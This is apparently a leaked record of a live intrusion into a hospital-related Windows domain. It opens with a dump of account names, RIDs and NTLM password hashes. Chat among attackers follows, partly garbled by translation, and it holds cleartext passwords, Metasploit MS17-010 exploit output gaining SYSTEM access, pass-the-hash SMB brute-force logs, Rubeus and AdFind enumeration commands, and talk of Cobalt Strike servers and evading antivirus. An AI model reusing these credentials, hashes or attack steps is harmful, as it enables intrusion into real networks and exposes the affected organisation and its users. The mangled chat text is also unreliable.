544 3124 nakunz 9dbc36a0c8329bd74432d16fc2c6bb6e 66080 3129 kbbitz 97e8e354617e6ee997afc476e63414a8 66080 3127 djepson b678ccaaaf35cbc0abfca452ad58a228 544 3131 bjvermeer 4c62227a61ee486a68c7a9669dde29c0 66080 1921 emseverson 4f44dedf2fde9618daac909e19bf86e0 66080 1349 gpnordahl 2fd4028cbf019e74c73561a8b38842a9 66048 1657 jlhoxibi 0d83157bb7516b53caefc4ddb26cb3a8 512 1837 jattarian c351b623e6b9a8644df6e0306668be3a 66048 1226 drpettit abc9339628f25497f82bff321aef2adf 512 1424 drlazzara 621cbce749b9e2d0d3932c569570af16 66048 1354 mhstrosu f101a562f2474a7ebf2c882996f78dfe 512 1414 mmalterud 252f40027953f53db8d5355fc4e623f3 512 3134 drsmith f53cbf927e94b3299e739c5bd5a68a82 66080 1383 drgundersen 6507e1a9ce1074d7033ace38472930d6 512 1431 rakhan a071fbf41deb4a041253d28e8349e11a 512 1255 mjblank 3a9be57e8803c1d632a52665e8886922 66048 2063 Dmsoderberg 1e27ea1d77323210ba372ef48bc2435b16 66080 1371 lindaanderson 99bc030173d93dd089f0fb00f663a592 512 1936 kdkaste 979cf8e3376ea416e5e9e247441f145b 512 2007 emurunga 68859a1fae623d63c1afb7f4722ef25e 66080 1367 drmcdonald f0e5ca8c0726e882a6d08ee2fecf6010 512 1494 bimanoel 53ced4ca69f53350ac0a242037b42d3c 512 2062 mlmcclure c724392f7594a12f52a3e2ae3f09ed93 66080 2059 sotto 556c52008436c466b802843877ce5b77 544 1895 lwatkins 335c8f6f374ddbb6942e65e09dbfba17 512 1464 stesfamariam c8ba09ade5d018958a24e66aab7eb381 512 3615 sdhansen 3be1b8bc507e147aec8fa1c8c3255ad1 66080 3133 ebibich b418813395857c8dd626946ca72aa6d 544 2060 cschroeder 848c5db736f59224b6521f83de457008 544 1316 njohnson 71b43a8306d1bb60e84a0bc2400a5a21 512 3126 krwannemacher 02ef3299dba8d6b10273d2ec377c451e 66080 2051 lemolter dc9515868900774b69ae6764f74b03d7 66080 3130 mfradet bfec4f416bd9c687473afb442cc89786 544 2066 amusolino 564591a18751d61a058a8e12a9ea2b3b 66080 3140 agqazi 37c1acdf538c07ebbebadb2e013b65e1 66080 1254 jyrkwa c49ad9b094c1e2e9070a48b48b50c40bbca 512 2058 mehouge 21ed21c51ceb7b847881ee01b0f2f0b2 66080 1390 jlnuss d7d4080754aa8e52b97190de07090957 512 3630 
hrose 1a7205abe0fafad537d6981673923a5d 544 3128 bgeorge e6cacfc8e3db00201d49bb163118f601 544 3139 cjfisher ede2b6f6f961d6a7a14181af90e0391e 544 2073 blsolheim 5d20da4120415a68bc3ffbe1f00551f4 66080 3632 barettig d6a8135ba862cf03dd064ecb505e1c98 66080 3115 sadahlen d79359164379bec437474a4d9d8944a0 66080 2074 drpauley 112602cfb846fe1795c14c68909dc678 66080 1166 pmpetecc 46e0ad709c50659fc59b550ed7f232f4 512 1365 mdmartineau f8ae494e75ede253bcc67de16fa28e03 514 3142 llcodner 50c1106bc8acb197a255aac5e721709c 66080 1541 qualcoord 0354dbb8b376dd32094b1aefd044d37a 512 3108 ztariq 4705d690f3cec55eaf97c339a69e71ad 544 1173 mjweinri 010f4c58fb04b3ef9b0dd6fbeaa9d33d 512 1682 ljoelkmu 3310515e0a269685d1f2c706cb1a84b8 512 2071 mchris c549a587fc362d601d0a52492a4f9ad3 66080 3148 kljohnson 54f315b20794c3d5f3eb65cef37dd955 66080 3150 kjwalters 0bb84c1adf6c83e25de00741092c319d 66080 3151 nsfroslie 7b759a3f19d6ffe661a629155aec8266 66080 3153 rdcampbell 9ddd27701fca52a3ec319fb2a5c34466 66080 2076 aregan c33f96e046365baab7d0a02204d42cbe 544 1491 slmcgaughey 200a4de5f8bd14c46d65bc8ad1c6ca06 66080 3106 pacs 8846f7eaee8fb117ad06bdd830b7586c 66080 1514 lbdraxten 4d91441f69a87232486af44a6b08f253 512 3633 knelson 03d0143159401abee5a528c0dce74768 544 2080 Cayarke a0316a9f9330960ddad527b32f5af0f4 66080 3638 ljniesche a0abcb477aa06118d0ebe413532cec34 66080 3639 tmwatterson 76aa8428553737150243c4c963d569fd19 66080 3637 jmotto 3a3c6bebeeec017dc900caeb7ccbfecdb 66080 2077 svaishnav 55d497470255d2714299777ea1a14440 66080 1293 madillon 1ff36f57aff1d5db8800d2c785a0cae0 66048 1764 vrdillsu fac2ef7f50e774a2e41df12dbc505099 512 3640 dkgrefe c7ed39affecbc90fd91a1abf68edda0b 66080 1686 tlanderson 55150fc03adda47232d11fa83533d995 512 1984 aleimkuhl cbcd954052a0dcd5384e34f3353a99e1 514 3641 jlheuerman 5281ff4763d8fb598c4266868eb8a7ad 66080 2088 cmmartel 5d1bc7b455964b6f5ae4317b6fb3b9f1 66080 3146 wdduphorn c3b2e61a8a7e9328a07c93457f636b0d 66080 1820 nronnrl 19ad78367f61ade03434329df699aafc 66048 1773 
tammimark 9938969a3e61da4b7762cb0b28e52eaa 514 2090 lmmilbeck 51aa35e3c69e3af7a8cad0f55e11d8fb 66080 3159 tjstudor ecdc539913db29572a6db500a015789f 66080 1942 nmnelson e63625ad3dbb41c2de8e7f25b5a18d69 512 3155 mzarbok c8e58daf37662e53ad521414519da823 544 1358 hjanderson ba2f17c9a6927eebe340a25d57fc63a8 66048 2048 aghohman 9649dda66c04c694863b38c02a6e3d3f 66080 3158 kmeichten d20236d18fdb68f0bd26824a1d687fbe 66080 2081 jdavis d9c08ff5332e2c79e582e88637cb260b 544 3642 cgordon 51457260c1e3b9e4b265a9201cdfd713 544 1757 kkstensu 0076dcfb228b7cf51861624948f4a2a5 66048 1925 slmontella 339a9f43281e1d64712917d8b34ab34e 66080 3154 skeller 4857e8c54f2cc52b41f268533403988c 544 2092 sburke a3742094f040007d503a077f3b7b18a1 66080 3636 pbaronhabberstad 5b53a73bf553fcf9374db33be0cc7fa 544 3141 vandvik cc5077e4d91fc974fa62d8629e9fba7a 66080 1799 alnelson 7e003487c37a3874283424b645d18668 512 2079 knstorey 1027f9d7f556dab44d720831e603bcd9 66080 2095 plhed 23e1cf54a3a8db2a8669d4e12a0a8241 66080 2094 dlundby 6b2a35a602186a65973c02150fb70bc9 66080 3161 klillquist e910bee2cd95a3cfabe052189783b1d4 544 1702 wynnkjhs aaa952b4f92018f800e5c19aa9255a6f 512 1706 slleroy 3f7684d51be0a9a78cd7e7a36c7e297a 512 1666 j_beyesu b5ef8bc4d492c5e96fd3ac3d538502bf 512 2083 kbressler 6177b8ccd78e74cd0e23f2121a0f95ca 66080 3156 rbeech b2c06077f1866a3ff2f0e30120d194a9 66080 3648 krubink fdf417ac259ab089e4fdb06269ff93ce 544 1277 djmoe d8a0a68924b7b8dad11e0940ee72a147 66048 1980 NWKS14$ ff080dfeb5a55503cd8129caeac080e4 4096 1521 NWKS13$ 8114caf690393938e8beead4db4c7bab96 4096 1420 aedraeger f23c5c919a07dd7cb86a9d9dab192ef9 512 3164 lmkeller b7ed01f474587ed397b553a566e0239b 66080 3165 drtest 787e222e7b428a71b895c3d39f1ca222 66080 3651 eripley 71b43a8306d1bb60e84a0bc2400a5a21 66080 3652 hsolo 71b43a8306d1bb60e840bc2400a5a21 66080 3653 jsparrow 71b43a8306d1bb60e840bc2400a5a21 66080 3654 erdoctor 7c53cfa5ea7d0f9b3b968aa0fb51a3f5 66080 2000 acbabb 64eaf056b0f7c0f0fc6951ce71e6d6c9 66080 1828 sjpeterson 
16497f15560fd9fa371c158b47241b66 512 2068 rluong a82f44c197d723aaca24812e8c6625c1 544 2101 testpacs d44c1eeef473921cc43b079f4a3c1412 544 3168 sclaus 64eaf056b0f7c0f0fc6951ce71e6d6c9 66080 3169 bbee 7c53cfa5ea7d0f9b3b968aa0fb51a3f5 66080 1109 aliedit a80fdb8db842a99d87ef3d857f8ddcf1 66048 1159 iccumgr 544e16f0bedca7fe5b2edb739a0f3111 512 1505 erdoctor1 b14459797d622853569db78c33b43474 512 1241 drtdlarson 5202215389406b0eccb2f1f029c57e9c 514 3166 athelen 2df4f3ee1b4faea233b68268ae983329 544 1574 VMUPGRADE$ 86bc8ae462a55843fe67520b11523d58 4096 1553 brhills 53c6e7c8b0150f36b797ad32d62abc28 66080 1661 reinasor ccf69751cc4a4f8e318b0df52947ccc4 512 3656 mbravo a9bcd52c5198a83a66fe224315fc73f 544 3163 aabliese c4fd4d6e475ab961362ce4ee231aca2b 66080 3109 kjstenger 8ec37706d3de0518b3220192dfc58061 66080 1805 jegervpt 701a630ff55b9ca5c8639cfa39020564 512 1324 lindasander e2a2964ed651c0f7ba4ec81dd01e02aa 66048 3650 khowell cf561634a85d8f5597446005fe7fd8d1 66080 1158 m_rittcc 18bf1995a1d949b7ef9741892266efc5 66048 1118 WSERV0$ 9da2e9383bf4520440d92ac54ac8a4d58 4096 1745 lljennbi f6d4b79198861b1be247d463634341c6 512 2042 pjzimmerman 84ce0bce7008f217cd687f3e5126eeeeee 66080 3614 badahlen 75222701b0d398c68117ca403f205478 66080 1174 aanelssu bad82b030b9c4842f80656a128a76b67 512 1758 hmneulsu 78e277034ec4906d2525b079d4c5749e 512 3174 danderso d4e7dcc95e80467c613daa02cd83b446 66080 3664 ewestergard ba4aa5e94885b31904af6af6c1bf4f39b11 544 3173 csylvester 55b7d520ed567ed59988a54f20078de6 66080 1943 lmweiss 706ee8e0530f19256d86b5457ffa93d9 512 3172 nlstrand c4300f168b4a6ba2c638ce330c4b4a0d 66080 1282 jillgeary 2f913a2a114e727390a6aedc67024b8b 512 502 krbtgt 0743a7d1387b8223ea5683c913ff9e33 514 3661 bgesell d18a344ee8d2bd0a7cf2c10b17a1ee02 66080 1889 hmasmus 62dbe4c921ea6d6f5f412b982405a944 66082 1317 kverjlsn ab6bf500d58072acd7d09530dce4f6b 512 1922 degrunewald 5d773ea1aa7e3d4e47fc15750e8084ad 66080 3658 rloepp c88b55448a90898be0d8eaca3e7c9961 544 3666 ceaves 
3ea18c0fbd5c65cdc2b3cb180f99aa0d 66080 3177 jlwilcox 633d364df0e81ee7ce9de549fc9b0088 66080 3628 MRNWKS14$ 3e00e4aae6f1cf0133f66a3b70959413 4096 3178 dmbartels 3cd77333d81bd637234a19ac76ad399b 66080 3181 nraman 366b8b4a49c10e7441fc1b241868a2f2 66080 3635 bdelage 2699a0a42951c71f032da1b9e2bfbf05 544 500 Administrator a80fdb8db842a99d87ef3d857f8ddcf1 66048 1523 tbmatheson 1f776ee6e96b208f8925b03cf11994e8 66080 3660 cfricano 6bbcb20afde0d6b67e6761bb9a7e280 66080 1926 drbarker f990ee0e10ca11e126d7e7001181c0dd 66048 1477 levranz 08a4a2727a1ca671c9260c85d6debc46 66050 3674 jhansen da59c62be282a2b3a207d663eaba129d 544 3676 bsundar df4e2753ded8ea9d3982d6b386196c95 66080 3186 slmcdonough 19019865c9627db050d3debc6d068d59 66080 3187 sbkriegler 51a6eff0344e71a73ba0465acba0dc02 66080 1219 drmagnuson 2b89a35ea806d441361b86e8928f0069 66050 1884 drdellison 7b3ed86168a343943a860db9fd43326 514 1617 radmgr c6ff3f57b90e71395cc63de7b5b80086 514 3104 kkkemper bfe2bdf62b5d348db2317060791183ad 66082 1625 dennjxr f5c1703c283b2e86061e499e9add725c 514 1867 kbitzan c9ea8a405ddbf37e55ef0fa1fc5e7062 514 1635 kjjohnxr 50a17b4631d880ab69c0bff939184e1e 514 1643 llsander 71b43a8306d1bb60e84a0bc2400a5a21 514 1396 amvoorhees 71b43a8306d1bb60e84a0bc2400a5a21 514 1447 llmarfell 382caba988ddcb6b0e7d433b44168b60 514 3110 abthompson 752c4e688d32292b2369a20766f97fe9 66082 2049 tjpeters 661245aab3a2da1cffb9296f4c1bb2d1 66082 1648 thomrmxr 22daffebc9951232db7c2255367541f4 514 1243 bmc 51e4a88e2b207731dfde221c1aac6433 66050 1232 drvan 6198afcefcf76d5aa8ed5a0231f7c4c6 66050 1235 krw f53551d10c915a704f27bd094983b4a1 514 1399 rapearce f5fca4da57abb3624aec5ca9711fad2e 514 1869 drpinke 928084d464e8e2b46953a287d34603ce 514 1901 vkapoor f08ad0acd589ac2d8077cc6be3823b55 66082 3655 drtillotson a14701c2fc0c888805c49abedeab76c7 546 1259 cardiology 0909df2be620d82633dbe6df2a14e822 514 1484 drriley efd9ec287d222a56e5c58fbb5e0c00b3 66082 1511 jkkaspari b68960c19bebf90e2519ff493224cb5d 514 1510 dmspierer 
4a842475a181664261effe96a0294ffb 66082 3683 lrhtest c0c14d4369392a6c8984e135341a3e35 66048 1340 akdrouillard b999e773055362a90e066168697f34b1 512 3157 emrabie 84ffe7a05489be6b159d1be4f28d8654 66080 3188 testrad01 7a21990fcd3d759941e45c490f143d5f 66080 3136 arwilliams 1c8a15dc2cf39ad724ecffa34c51df22 66080 3189 kccoleman c53f411c5c25205eb6e41cf532f15f3 66080 3192 kmmuckenhirn 08e79d731566b3e02ee6567b67e06bc2 66080 3193 tlheckman b4fef99bb054df27f3155fb289ddbb09 66080 3185 lglidden 1c74a011d13341346553b4cab99c5f4f 66080 3688 tcarpenter 6dfbc391f973e9edae3d284e217ca305 66080 1162 jdfransen ac3b03f29ce9321c5dc6505ecb69de3c 66048 2085 mdborowski 9d5c0d7a29ba9ab4e8f5ea70731742 66080 3690 jtreynolds 740500dd0c0a4113cb30053c083016d0 66080 1322 jmbernsn 82f1948a684b1ca3acf28319c5a8d011 512 3679 kglasgow 990c521adaaa5e4addf2c9a76018315c 544 3691 mhudalla 753e11fb4f4c64d36d3ec29df1c14b33 544 1829 alerickson 6bd1928a5bff3e98e4e5883d182ecfa4 512 3198 sbeving 395aad84da74aa6f8e56c3461b797315 66080 3200 kpeterson b4d06b8670a68c90ad1b704bbd3fa4a6 66080 3203 naolson e9beec3ca6b473c4e656c1ef9c62a18c 66080 3204 jschmidgall 2e00b6ec17a25e579e9d78463d556549 66080 3206 mdanelke 58d267031108d7b9089fb94f236785c8 66080 3207 cblascyk 9c3b90b15f00f481b94aa164729a4d9b 66080 3208 tbengtson 5b91192b86e5e38304e03cc463c2688c 66080 3209 bkipp 2f2b9a59122f528ae9dab4919eef021a 66080 3210 jstock 04a4816d0d9c50ed5d81967e4472b2 66080 2069 ssnordby b87873f5c36e099a1dd70c2997ee7634 66082 3699 nchelliah 99d18a5640490c029a99461967318196 66080 3700 aathey 802b86f643c99aef0d2ffb945005e482 66080 3121 blee e5291f1449f66686a1def83daa759f66 66082 3706 belee 80b039cd64077f54d6a6c87b76e5cf5f 66080 3708 phaberer f9c143be0041861bb993f39f78df0952 66080 3709 jeandrews 47b29e7297e1a2c493882cb5d1acb5a6 66080 3717 cwarde b97536d0b9013d6c80f2e51d85a6a6ab1 66080 3718 mwendt 0c9dc5585aea4f3f673fad73bc01b5c2 66080 3726 sdenardo 7f77eaa05b49ccc5de2152719fa83158 66080 3728 amiller 7af9829b5e7a480432bbff19ba1a8293 66080 3707 
The third one I pulled, the first two didn't come. All of them arrive, but it's something to work with; I wish I could take it out of my hands.

```
Success: 'LRHC\pdsanderson:922.Hibe' Administrator
```

Now I'm sure I'll be able to do everything) at the two-hopoogle, I'm the only one with an admin - he's a domain user.... not to lock it, so what's the problem::( however

```
The request will be processed at a domain controller for domain ffmg.local.

Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          999
Minimum password length:                              4
Length of password history maintained:                3
Lockout threshold:                                    10
Lockout duration (minutes):                           1
Lockout observation window (minutes):                 1
The command completed successfully.
```

`922.Hibe` it will be easier to ping in this trust all cars, and pinged passed on ms17
this on other server osprover)))))))
dllk does not fly
There is not enough space on the disk. 0 file(s) copied.
Come on, you want some laughs?
LRHC\pdsanderson 8a48ebb4e8aadeb8f71b999ba84ab520
On the second one, however, here:

```
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 10.5.50.192
rhosts => 10.5.50.192
msf6 auxiliary(admin/smb/ms17_010_command) > exploit
[*] 10.5.50.192:445 - Target OS: Windows 5.1
[*] 10.5.50.192:445 - Filling barrel with fish... done
[*] 10.5.50.192:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.5.50.192:445 - [*] Preparing dynamite...
[*] 10.5.50.192:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.5.50.192:445 - [+] Successfully Leaked Transaction!
[*] 10.5.50.192:445 - [+] Successfully caught fish-in-a-barrel
[*] 10.5.50.192:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.5.50.192:445 - Reading from CONNECTION struct at: 0x8ae943d8
[*] 10.5.50.192:445 - Built a write-what-where primitive...
[+] 10.5.50.192:445 - Overwrite complete... SYSTEM session obtained!
[+] 10.5.50.192:445 - Service start timed out, OK if running a command or non-service executable...
[*] 10.5.50.192:445 - Getting the command output...
[*] 10.5.50.192:445 - Executing cleanup...
[+] 10.5.50.192:445 - Cleanup was successful
[+] 10.5.50.192:445 - Command completed successfully!
[*] 10.5.50.192:445 - Output for "net localgroup administrators":

Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
FFMG\Domain Admins
FFMG\psanderson
LRHC\pdsanderson
The command completed successfully.
```

The first one didn't go through.
ffmg.local

```
[+] 10.5.50.2:445     - Host is probably VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
[+] 10.5.50.192:445   - Host is probably VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[+] 10.10.220.45:445  - Host is probably VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
```

Rubeus

```
[*] Target Domain : mcklrh.mig
[X] No users found to Kerberoast!
[X] No users found to AS-REP roast!
[*] Target Domain : ffmg.local
[X] No users found to Kerberoast!
[X] No users found to AS-REP roast!
```

```
msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit
[-] 10.10.39.73:445 - Host does NOT appear vulnerable.
```

:zany_face: still trying to get through to the trust?
10.10.39.73 CLINICDC.ffmg.local
ffmg.local\canderson Gt#832!e
two more comrades will be joining you in a couple of hours,
that's why I say now I'll look up how to specify the domain in rubus
and on the contrary no kerb, what rubus finds
so it happens then most likely no kerbs in the other two trusts?
was the empty file 1kbati, what was the output?
and with -domain we loaded it in tpshnet
so you dropped it on the disk and it bloated?
so we already asked them through tactikAl PoVershEl
you can ask for the kerb through the innvoc kernelrssinjest
so I'll look for it on the gitea
I did not even save such nigdey
remember how invoc-kerbom asked for the kerb
can ask from trust?)
or in rubeus can poll the neighboring domains?
so why rubeus here? we have all the hashes from here
give hashes @tl2
simply rubeus will try to get a token in trust or just a grid pulled?
it's not a trust
stop even meme search)
2003 not pulled :D
well, as they say, im in first part
no, hash is the same for all
on mydoc in msf does not come up
above threw that came up from available LA and DA, and hash first part depends on domain, it will let such hash do?
screen of command line
these guys on trust also check the result smblogin?
we don't have access to the dc, not to say say say
in trust
not so, read my mistake, I'm talking about trusts of your input domain
trust is trust, current is input as I understand
a current trust is your input domain in trusts
what) current trust?
no, in current or trust?
on dc where?
after i uploaded and wrote that file, 1 kbyte empty create
and it's on dc in LA no?
yes we uploaded `rlschmidt`, i was taking info under it, it's not in trusts
you drop scripts why? upload them immediately
to the question about kerbs is very good, so well done, took down hell
`stexe -b dc=mcklrh,dc=mig -f "(objectcategory=person)" > C:\Standalone\mcklrh_mig_ad_users.txt` command example
and the admin under which you took off does not have access to trusts?
only i did not work through -hort as i tried yesterday
host ran cmd from admin and worked off batnik adinfo
@user7 hosted in what category? @hosts @uploads ?
would not believe the order not cast
so you can not cast
cast where?
how did you remove ad infos from the subs?
how is it with coba the issue there @migrate [pid]```` Invoke-Mimikatz ````Invoke-PSInject.ps1 ``jyrkwa`` It makes no sense to drop it, if you have kobaInvoke-Kerb creates an empty 1 Kb file in both trastasophos eats everything that drops through vrd also does not let download@tl1 is all adinfo if ches the rest minus`` `` [*][*] 192.168.254.92:445 - 192.168.254.92:445 - Starting SMB login 192.168.254.93:445 - 192.168.254.93:445 - Starting SMB login bruteforce [*] 192.168.254.92:445 - 192.168.254.92:445 - Correct credentials, but unable to login: 'lrhc\admin:aad3b435b51404eeaad3b435b51404ee:d763de4cc9cc9fe59203df903a5d98f8414', [*] 192.168.254.93:445 - 192.168.254.93:445 - Correct credentials, but unable to login: 'lrhc\admin:aad3b435b51404eeaad3b435b51404ee:d763de4cc9fe59203df903a5d98f8414', [+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\svc-aadc:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028' [+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\svc-aadc:aad3b435b51404eeaad3b435b51404ee:a5ed4977ab742434bd35761f3cb4c028' [+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\AvamarBackupUser:aad3b435b51404eeaad3b435b51404ee:d6538f029c412d2acf4ab547ee69bfce' [+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\AvamarBackupUser:aad3b435b51404eeaad3b435b51404ee:d6538f029c412d2acf4ab547ee69bfce' [+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\CDW.Tech1:aad3b435b51404eeaad3b435b51404ee:8e7aca5c0b671015c90656325fb9ea15' [+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\CDW.Tech1:aad3b435b51404eeaad3b435b51404ee:8e7aca5c0b671015c90656325fb9ea15' [*] 192.168.254.93:445 - 192.168.254.93:445 - Correct credentials, but unable to login: 'lrhc\CDW.Tech3:aad3b435b51404eeaad3b435b51404ee:2e41b2db123922abbb0b7417c37376f3 [*] 192.168.254.92:445 - 192.168.254.92:445 - Correct credentials, but unable to login: 'lrhc\CDW.Tech3:aad3b435b51404eeaad3b435b51404ee:2e41b2db123922abbb0b7417c37376f3', [+] 
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
and the cob is not there yet
after checking the admins can learn psh empire
+ in three logins then one by one lA then the current one then the trust one
write only login pass
no like domain is written separately
certainly i forgot
just think all at once fuck all or first so, then so and so
in the file write domain or in SMBDomain all separately specify?
domain is specified as a separate option in smb_login
then there is still a question about the domain of trust
as the domain of the current one i.e. without domain
even with 3da?
with domain also or as you said before just LA check without domain or not...
so the question is about USERPASS_FILE in smb_login
ok to work through hash empire in the current domain instead of coboy that's why i asked
so why are you telling me about it)))
and speaking of hash empire and win2003 ok or at least the new cobap talk more)
how will LA on dk in the domain check hashes as agreed do not touch it
so do you really pull in hash empire 2003?
hashm can work with hashes
hashmap
okay at once backup check admins
new coba will be a couple of hours
so how network admins configure the equipment and using what is a long discussion and about private just stop at some open source with data on cobas and other utilities
honestly do not want to deal with this topic now
after closing the network coba immediately dirty shit
you gave him a coba net as @user4 works then?
you've been working with them for a long time
everyone's coba is in the bleep
all my coba is in the bleep
all your coba is in the bleep
I think it's better to ping the domain above than to ping it, then the plan is to ping it, have you tried emire yet?)
and by the way, a question on million ping `fullref.com` google pings but does not ping cobbs? does dupn see external?
and tell me that the same answers are like this 23[.]106[.]160[.]61 cobalt
oy the fuck maybe I misunderstood something
not all at once said of course, and more specifically?
colleagues 10[.]10[.] and so on[.] who said?
i was told so here in quotes and apostrophes
within the wrong way
wikibros.com cobalt "wikibros.com" cobalt)
and how to google it?
the name of the domain sends to the fandom by mario
wse the window as I say ask colleagues who work for gofer how to understand it
directly says: your koba is exposed, get out of town
similar just no?
Beware YOU BLEED IF YOU SEE THIS DOMAIN/IP
I will be directly written if my koba is exposed, how to understand it?
and along the way check admin
check the ipi of the domain list "ipi" kobalt
here recently checked, check it out, I think it has not lighted up?
i your colleagues recently said that their combs lighted up
100% losya all of our combs pinged from the dedic and dk current domain
about combs ping wideio.com not respond I did not about it at all on 2003 vverchela net the current sees
2003 tpsh not see your combs how new?
i can't see all tpsh but can't see all msf
but can't see all msf?
and behind the vpn coba can not be seen you go to trast
so dedik behind the vpn do token admin
h I understand in the process can turn the dedik to cobus hashemi what to do then conditionally 1-2 approached dana lanachina
junneti start to run in turn on both dc you go to kmd5 again 1 to 1c their hashemi take current dc and eatam conditional burth
why?
yes a lot of things but how to treat that without the ability to create a token through the hash
that with hash you can brute force it I understand with hash and smb_login likes hashes
a meaning of those who I DID brute force passwords are the same a hash for all)
clearing creeds are for 4
I'm already confused what do we call them here in terms of a new grid or a team server?
I checked yesterday, but do not remember who i sure did
lrhc\Administrator svc-aadc mcklrh\svc-aadc lrhc\svc-aadc
In 2 hours we'll issue a new cobu
in general, run all YES, EA on DC trasta can brute force)
```
The request will be processed at a domain controller for domain mcklrh.mig.
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): Unlimited
Minimum password length: 5
Length of password history maintained: 1
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
The command completed successfully.
```
even if 0 bytes files were created so it was ok with the rights
you can check in windows\temp to cast doubts
but although it's 2003 mbe there was not enough rights to the root
...but since you said you tried it in the root of the disk, it's gone.
i told you to check windows\temp but yes
ProgramData is not a folder in 2003 by the way i just noticed
yesterday i did it from the psb and it gave me an error
i'll try to make a dll on the dd and from there i'll make enum_ad_* in the msf thinking something will happen here
so i went to the msf but it's not right, right?
that's how i tried it originally - dedeepic - domain drive - trust survey and there is a connection through wmc under the credentials
yes run the files that take the hell off the trust which you specified in the batnickets from the dedicates send files to take hell off inside the domain on some server thought)
this is the only machine available that this is a bug in it i can refer to win2003
cmb_login the thing is that your car is not officially in the domain + from the context try to make a request through the trace from the car domain through the meter from trusts
i'm trying to make a request through vomi from trusts?
i tried to make a request through the trac the domain through the trusts
I tried to make a request through the mesper from the trac?
i'm using msf17 from my default gateway sitting behind their VPN, but meter is on my VPN, i thought it would work without it, but i have to pull session to default gateway
in msf do a search for enum_ad_*
in msf there is a module enum_ad_users by the way
i do not understand why, @user8 has a session there?
where did you put it?)
https is not supported
https://
how to download files to the car through tpsh? i can not do it
a seems to see the external?
no, something
a check unattend files
where vmikom, where ms17 and so on and so forth
do you run commands there through ms17?
i don't have it yet, it cuts me off when i put it on my harddisk, even though i disabled the windup, were there any invok-kerbs on the psh
kerbs?
i don't see it in the processes of the current domain
certainly on the current machine it is in the processes but on the other hand i don't see it in the processes
maybe there's sofos there's another guess
i also think sofos and tried to root it
there's probably sofos worth
a meaning try to copy hell to this folder
againly such files
i wont get it into the terminal i won't throw it in the dir
C:\Program Files\Microsoft Azure AD Sync\UIShell>tasklist /s 192.168.254.107 /v
```
02/08/2020 03:56 PM 134 Sophos AutoUpdate 5.8.358 setup log 20200208 155610.txt
```
I can't put it in the meter
where do you have a map in general through Y share
dir C:\windows\temp but inside it doesn't show that there is such a folder
it just tells me dir Y:\ProgramData\ as if I write it in the dir I am not allowed in at all?
and on 2003 some av is
*did not seem to have anyone yesterday, I'll re-screen the process list
is anyone interesting?
i had a chance to beat it with psh, but it's 2003, only there was a vulnerability
2003 I wrote myself added lA via ms17 on a 2003 server no one with admin privileges + general EA check here
current user who joined the domain as lA
```
[+] 192.168.254.92:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC01) (domain:MCKLRH)
[+] 192.168.254.93:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC02) (domain:MCKLRH)
```
```
Get list of DCs in domain '' from '\\RadDC01.mcklrh.mig'.
RADDC02.mcklrh.mig [DS] Site: Default-First-Site-Name
RADDC01.mcklrh.mig [PDC] [DS] Site: Default-First-Site-Name
The command completed successfully
```
from kmd
`nltest /dclist:`
you're hilarious)
I never figured out how to take a list of dc's via kmd, but I guess in the output smb_version all dc's were taken?
and sometimes just hung up
in this variant, files of size 0?
either 0 objects, or ERROR: 0x1
```
AdFind.exe -f "(objectcategory=person)" -h 192.168.254.107 > ad_usr.txt
AdFind.exe -b DC=mcklrh,DC=mig -f "(objectcategory=person)" > ad_usr.txt
AdFind.exe -b DC=mcklrh,DC=mig -f "(objectcategory=person)" -h 192.168.254.107 > ad_usr.txt
```
I've done this remotely if I drop 0 bytes files
```
C:\ProgramData\AdFind.exe -f "(objectcategory=person)" > C:\ProgramData\ad_usr.txt
C:\ProgramData\AdFind.exe -f "objectcategory=computer" > C:\ProgramData\ad_comp.txt
C:\ProgramData\AdFind.exe -f "(objectcategory=organizationalUnit)" > C:\ProgramData\ad_ous.txt
C:\ProgramData\AdFind.exe -subnets -f (objectCategory=subnet) > C:\ProgramData\subnets.txt
C:\ProgramData\AdFind.exe -f "(objectcategory=group)" > C:\ProgramData\ad_group.txt
C:\ProgramData\AdFind.exe -gcb -sc trustdmp > C:\ProgramData\trustdmp.txt
```
give me the start command + the contents of the batch + the copy command
or even that doesn't work? Are you kidding me and take it off?
what's the problem with addfind in the trust car?
i'm telling you it's not working))))
dat you have a single entry point to the trust, i've uploaded the trust to the msf and now i have the current domain there.
without flag kipi dll is not deleted but no session
nopsh/randll the process hangs in kobu
neither in tpsh nor in msf
vvodnot
shere draw the trust also no way
okay understood
tried to drop in the trust domain eh and batnick and run remotely
tried in the current domain specifying trust domain/host dk trust domain
described it)
how did you remove hell from trusts?
and the last question to close this dialogue is it clear?
and he gave me - 0 objects
i know that there are at least a few computers on the server
windup if it was not a computer the latter could be considered true
i got either an error or hanging, or 0 objects
and so already tried to remove hell in fupot
added there LA of the three trusts one in quarantine of the remaining two I have access to one
in this one i used ms17 to request YES and EA all the same
described trustakkaha
how did you find then users....
file was empty and when it was an error was in the console
did you have an error or i do not understand?
i reshot trusts without output to file and files 0 bytes
the point of lit you do not fill files to confu
kerb i did not shoot, now i will do
if 1, i reshot trusts yesterday and there nothing has changed
if 2, i already wrote that i failed to take them down
in terms of re-scanning from the current domain or hell
